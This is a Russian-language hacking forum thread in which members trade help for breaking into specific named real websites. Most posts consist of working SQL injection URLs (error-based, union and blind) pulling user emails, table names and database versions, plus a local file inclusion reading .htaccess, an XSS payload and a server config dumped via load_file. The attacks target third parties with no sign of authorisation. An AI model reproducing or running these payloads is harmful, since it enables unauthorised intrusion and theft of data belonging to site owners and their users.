Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    Подскажите, почему не выводит данные из таблицы?
    PHP:
    http://english.in.ua/contacts.php?id=8+or+1+group+by+concat%28%28select+email+from+acc_users+limit+12,1%29,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+#
     
  2. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    а если мне пишет что

    SELECT command denied to user 'блаблабла'@'localhost' for table 'user'

    ет чё значит?
     
  3. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    952
    Likes Received:
    318
    Reputations:
    52
    значит у данного юзера нет прав для доступа к таблице user.
    Пользуйтесь переводчиком!
     
  4. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    Подскажите, почему не выводит данные из таблицы?
    PHP:
    http://english.in.ua/contacts.php?id=8+or+1+group+by+concat%28%28select+email+from+acc_users+limit+12,1%29,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+#
     
  5. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,781
    Likes Received:
    854
    Reputations:
    857
    Используй конструкцию cast as char

    Code:
    http://english.in.ua/contacts.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(select+table_name+from+information_schema.tables+where+table_schema=0x656C636B6965765F6272616E63685F31+limit+11,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
    
    http://english.in.ua/contacts.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(select+cast(acc_users.email+as+char)+from+elckiev_branch_1.acc_users+limit+8,1)+)+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
    
     
    _________________________
    #18585 BigBear, 10 Dec 2011
    Last edited: 11 Dec 2011
    2 people like this.
  6. ~EviL~

    ~EviL~ Elder - Старейшина

    Joined:
    14 Aug 2007
    Messages:
    169
    Likes Received:
    77
    Reputations:
    4
    Вот нашел уязвимость:
    Code:
    http://www.eash.eu/openletter2011/index.php?file=stylesheet.css
    
    А дальше можно как-то развить ее?
     
  7. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,158
    Likes Received:
    424
    Reputations:
    231
    Это не уязвимость
     
  8. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    403
    Likes Received:
    40
    Reputations:
    23
    так сделай

     
    2 people like this.
  9. t3cHn0iD

    t3cHn0iD Banned

    Joined:
    6 Apr 2009
    Messages:
    315
    Likes Received:
    63
    Reputations:
    66
    Если вбить кавычку в пост-параметр, то вылазит ошибка вида
    HTML:
    Error query: UPDATE `userdata` SET `email`='666@666.ru', `mobile`='', `hometel`='', `icq`=''', `website`='', `forumnick`='' WHERE (`uid`='50536')
    конкретно это icq.Я так понимаю, что кроме того, что я вижу название таблицы,то больше ничего не добиться ?
     
  10. Чакэ

    Чакэ Elder - Старейшина

    Joined:
    15 Aug 2010
    Messages:
    260
    Likes Received:
    66
    Reputations:
    62
    в уязвимый параметр пиши select lol from troll и смотри результат выборки в анкете, или от чего это инфа. подзапрос же, ну ты понел..
     
  11. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    403
    Likes Received:
    40
    Reputations:
    23
    Загрузил через load_file httpd.conf и не могу найти путь к сайту. Где он тут прописан?

    Web Server: Apache/2.2.15 (Linux/SUSE)
    Code:
    # /etc/apache2/httpd.conf 
    #
    # This is the main Apache server configuration file.  It contains the
    # configuration directives that give the server its instructions.
    # See <URL:http://httpd.apache.org/docs-2.2/> for detailed information about
    # the directives.
    
    # Based upon the default apache configuration file that ships with apache,
    # which is based upon the NCSA server configuration files originally by Rob
    # McCool. This file was knocked together by Peter Poeml <poeml+apache@suse.de>.
    
    # If possible, avoid changes to this file. It does mainly contain Include
    # statements and global settings that can/should be overridden in the
    # configuration of your virtual hosts.
    
    # Quickstart guide:
    # http://en.opensuse.org/Apache_Quickstart_HOWTO
    
    
    # Overview of include files, chronologically:
    #
    # httpd.conf
    #  | 
    #  |-- uid.conf  . . . . . . . . . . . . . .  UserID/GroupID to run under
    #  |-- server-tuning.conf  . . . . . . . . .  sizing of the server (how many processes to start, ...)
    #  |-- sysconfig.d/loadmodule.conf . . . . .  [*] load these modules
    #  |-- listen.conf . . . . . . . . . . . . .  IP adresses / ports to listen on
    #  |-- mod_log_config.conf . . . . . . . . .  define logging formats
    #  |-- sysconfig.d/global.conf . . . . . . .  [*] server-wide general settings
    #  |-- mod_status.conf . . . . . . . . . . .  restrict access to mod_status (server monitoring)
    #  |-- mod_info.conf . . . . . . . . . . . .  restrict access to mod_info
    #  |-- mod_usertrack.conf  . . . . . . . . .  defaults for cookie-based user tracking
    #  |-- mod_autoindex-defaults.conf . . . . .  defaults for displaying of server-generated directory listings
    #  |-- mod_mime-defaults.conf  . . . . . . .  defaults for mod_mime configuration
    #  |-- errors.conf . . . . . . . . . . . . .  customize error responses
    #  |-- ssl-global.conf . . . . . . . . . . .  SSL conf that applies to default server _and all_ virtual hosts
    #  |
    #  |-- default-server.conf . . . . . . . . .  set up the default server that replies to non-virtual-host requests
    #  |    |--mod_userdir.conf  . . . . . . . .  enable UserDir (if mod_userdir is loaded)
    #  |    `--conf.d/apache2-manual?conf  . . .  add the docs ('?' = if installed)
    #  |
    #  |-- sysconfig.d/include.conf  . . . . . .  [*] your include files 
    #  |                                             (for each file to be included here, put its name 
    #  |                                              into APACHE_INCLUDE_* in /etc/sysconfig/apache2)
    #  |
    #  `--  . . . . . . . . . . . . . .  for each virtual host, place one file here
    #       `-- *.conf . . . . . . . . . . . . .     (*.conf is automatically included)
    #
    #
    # Files marked [*] are created from sysconfig upon server restart: instead of
    # these files, you edit /etc/sysconfig/apache2
    
    
    
    #  Filesystem layout:
    #
    # /etc/apache2/
    #  |-- charset.conv  . . . . . . . . . . . .  for mod_auth_ldap
    #  |-- conf.d/
    #  |   |-- apache2-manual.conf . . . . . . .  conf that comes with apache2-doc
    #  |   |-- mod_php4.conf . . . . . . . . . .  (example) conf that comes with apache2-mod_php4
    #  |   `-- ... . . . . . . . . . . . . . . .  other configuration added by packages
    #  |-- /etc/apache2/
    #  |-- errors.conf
    #  |-- httpd.conf  . . . . . . . . . . . . .  top level configuration file
    #  |-- listen.conf
    #  |-- magic
    #  |-- mime.types -> ../mime.types
    #  |-- mod_autoindex-defaults.conf
    #  |-- mod_info.conf
    #  |-- mod_log_config.conf
    #  |-- mod_mime-defaults.conf
    #  |-- mod_perl-startup.pl
    #  |-- mod_status.conf
    #  |-- mod_userdir.conf
    #  |-- mod_usertrack.conf
    #  |-- server-tuning.conf
    #  |-- ssl-global.conf
    #  |-- ssl.crl/  . . . . . . . . . . . . . .  PEM-encoded X.509 Certificate Revocation Lists (CRL)
    #  |-- ssl.crt/  . . . . . . . . . . . . . .  PEM-encoded X.509 Certificates
    #  |-- ssl.csr/  . . . . . . . . . . . . . .  PEM-encoded X.509 Certificate Signing Requests
    #  |-- ssl.key/  . . . . . . . . . . . . . .  PEM-encoded RSA Private Keys
    #  |-- ssl.prm/  . . . . . . . . . . . . . .  public DSA Parameter Files
    #  |-- sysconfig.d/  . . . . . . . . . . . .  files that are created from /etc/sysconfig/apache2
    #  |   |-- global.conf
    #  |   |-- include.conf
    #  |   `-- loadmodule.conf
    #  |-- uid.conf
    #  `-- vhosts.d/ . . . . . . . . . . . . . .  put your virtual host configuration (*.conf) here
    #      |-- vhost-ssl.template
    #      `-- vhost.template
    
    
    
    ### Global Environment ######################################################
    #
    # The directives in this section affect the overall operation of Apache,
    # such as the number of concurrent requests.
    
    # run under this user/group id
    Include /etc/apache2/uid.conf
    
    # - how many server processes to start (server pool regulation)
    # - usage of KeepAlive
    Include /etc/apache2/server-tuning.conf
    
    # ErrorLog: The location of the error log file.
    # If you do not specify an ErrorLog directive within a <VirtualHost>
    # container, error messages relating to that virtual host will be
    # logged here.  If you *do* define an error logfile for a <VirtualHost>
    # container, that host's errors will be logged there and not here.
    ErrorLog /var/log/apache2/error_log
    
    # generated from APACHE_MODULES in /etc/sysconfig/apache2
    Include /etc/apache2/sysconfig.d/loadmodule.conf
    
    # IP addresses / ports to listen on
    Include /etc/apache2/listen.conf
    
    # predefined logging formats
    Include /etc/apache2/mod_log_config.conf
    
    # generated from global settings in /etc/sysconfig/apache2
    Include /etc/apache2/sysconfig.d/global.conf
    
    # optional mod_status, mod_info
    Include /etc/apache2/mod_status.conf
    Include /etc/apache2/mod_info.conf
    
    # optional cookie-based user tracking
    # read the documentation before using it!!
    Include /etc/apache2/mod_usertrack.conf
    
    # configuration of server-generated directory listings
    Include /etc/apache2/mod_autoindex-defaults.conf
    
    # associate MIME types with filename extensions
    TypesConfig /etc/apache2/mime.types
    DefaultType text/plain
    Include /etc/apache2/mod_mime-defaults.conf
    
    # set up (customizable) error responses
    Include /etc/apache2/errors.conf
    
    # global (server-wide) SSL configuration, that is not specific to 
    # any virtual host
    Include 
    
    # forbid access to the entire filesystem by default
    <Directory />
        Options Indexes
        AllowOverride None
        Order deny,allow
        Deny from all
    </Directory>
    
    # use .htaccess files for overriding,
    AccessFileName .htaccess
    # and never show them
    <Files ~ "^\.ht">
        Order allow,deny
        Deny from all
    </Files>
    
    # List of resources to look for when the client requests a directory
    DirectoryIndex index.html index.html.var
    
    ### 'Main' server configuration #############################################
    #
    # The directives in this section set up the values used by the 'main'
    # server, which responds to any requests that aren't handled by a
    # <VirtualHost> definition.  These values also provide defaults for
    # any <VirtualHost> containers you may define later in the file.
    #
    # All of these directives may appear inside <VirtualHost> containers,
    # in which case these default settings will be overridden for the
    # virtual host being defined.
    #
    Include /etc/apache2/default-server.conf
    
    
    # Another way to include your own files
    #
    # The file below is generated from /etc/sysconfig/apache2,
    # include arbitrary files as named in APACHE_CONF_INCLUDE_FILES and
    # APACHE_CONF_INCLUDE_DIRS
    Include /etc/apache2/sysconfig.d/include.conf
    
    
    ### Virtual server configuration ############################################
    #
    # VirtualHost: If you want to maintain multiple domains/hostnames on your
    # machine you can setup VirtualHost containers for them. Most configurations
    # use only name-based virtual hosts so the server doesn't need to worry about
    # IP addresses. This is indicated by the asterisks in the directives below.
    #
    # Please see the documentation at
    # <URL:http://httpd.apache.org/docs-2.2/vhosts/>
    # for further details before you try to setup virtual hosts.
    #
    # You may use the command line option '-S' to verify your virtual host
    # configuration.
    #
    Include /etc/apache2/vhosts.d/*.conf
    
    
    # Note: instead of adding your own configuration here, consider 
    #       adding it in your own file (/etc/apache2/httpd.conf.local)
    #       putting its name into APACHE_CONF_INCLUDE_FILES in 
    #       /etc/sysconfig/apache2 -- this will make system updates 
    #       easier :) 
    
     
  12. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    Как-бы намекает.
     
  13. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,599
    Likes Received:
    1,308
    Reputations:
    1,557
    LFI, но похоже, что из директории не выпускает.
    http://www.eash.eu/phpmyadmin/print.css - файл есть
    http://www.eash.eu/openletter2011/index.php?file=../phpmyadmin/print.css - файла нет

    Можно почитать файлы, к которым нет доступа через сайт:
    http://www.eash.eu/openletter2011/index.php?file=.htaccess

    Использовать для XSS:
    http://www.eash.eu/openletter2011/index.php?file=<img/src="a"onerror="alert(1)">

    Или просто найти другой баг на сайте, как было написано выше =)
    Code:
    http://www.eash.eu/openletter2011/index.php?file=show.php&ref=-1+and+1=0+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database()),9,10,11,12,13,14,15,16,17,18,19,20+--+
    
    5.1.49-3:eash_live@localhost:eash_live
    Кавычки не фильтруются и не экранируются
     
    #18593 M_script, 12 Dec 2011
    Last edited: 12 Dec 2011
  14. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Code:
    http://www.bandiklatprovbali.info/?modul=detil&id=-5+and+1=0+uni%0Bon+se%0Blect+1,2,3,4+--+
    Can't get vuln number?
     
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    http://www.bandiklatprovbali.info/?modul=detil&id=5'and(false)union(select(1),2,3,4)--+
     
    _________________________
  16. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Is this site vulnerable?

    Code:
    http://www.zkm.com.cn/en/product_x.php?id=-1+and+1=0
    Nothing yet works on it.
     
  17. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,781
    Likes Received:
    854
    Reputations:
    857
    Yes. Its vulnerable

    Code:
    _ttp://www.zkm.com.cn/en/product_x.php?id=1+and+substring((@@version),1,1)=5  TRUE
    
    _ttp://www.zkm.com.cn/en/product_x.php?id=1+and+substring((@@version),1,1)=4  FALSE
     
    _________________________
    1 person likes this.
  18. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Thank you, I thought as much; Blind SQL Injection.

    I'll have my take on it.
     
  19. infoseller

    infoseller Member

    Joined:
    17 Aug 2011
    Messages:
    136
    Likes Received:
    13
    Reputations:
    0
    Подскажите: http://site.com/?con=news&tipe=http://google.com отображается на странице как "http://google.com", читалки тоже нет...
     
  20. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,781
    Likes Received:
    854
    Reputations:
    857
    Имхо это обычный заголовок, вставляемый в TITLE страницы. Ничего другого без указания линка на ум не идёт...
     
    _________________________
Loading...
Thread Status:
Not open for further replies.